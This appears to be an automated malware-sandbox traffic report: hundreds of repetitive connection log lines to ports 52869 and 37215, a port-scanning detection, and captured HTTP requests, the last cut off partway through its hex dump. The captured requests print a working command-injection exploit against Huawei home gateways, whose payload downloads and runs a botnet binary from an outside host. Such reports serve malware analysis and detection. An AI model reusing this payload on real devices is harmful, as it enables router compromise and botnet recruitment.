Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59798 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34272 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39426
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39434
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39440
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39444
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39448
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39456
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39460
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39466
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39482
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39490
Source: unknown	Network traffic detected: HTTP traffic on port 40462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53692 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53686
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 53692
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48050 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 48050
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40338 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40342 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33660 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60920 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37530 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48074 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34102 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56142 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39974 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53182 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55772 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54120 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54122 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43020 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43056 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34552 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41104 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58456 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36114 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34552 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37286 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 37286
Source: unknown	Network traffic detected: HTTP traffic on port 37892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36310 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42290 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33158 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41570 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34552 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37460 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51612 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36986 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43164 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43168 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59090 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50910 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59556 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59556 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35326 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34552 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59556 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35326 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35326 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55546 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 47336 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47362 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37646 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35326 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48450 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49368 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59556 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55546 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37646 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48450 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49368 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55546 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37646 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48450 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34322 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49368 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35326 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37646 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55546 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48450 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46818 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49368 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59556 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37646 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54806 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 36622 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53392 -> 52869

Connects to many ports of the same IP (likely port scanning)

Show sources

Source: global traffic

TCP traffic: 185.52.81.148 ports 2,5,6,8,9,52869

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 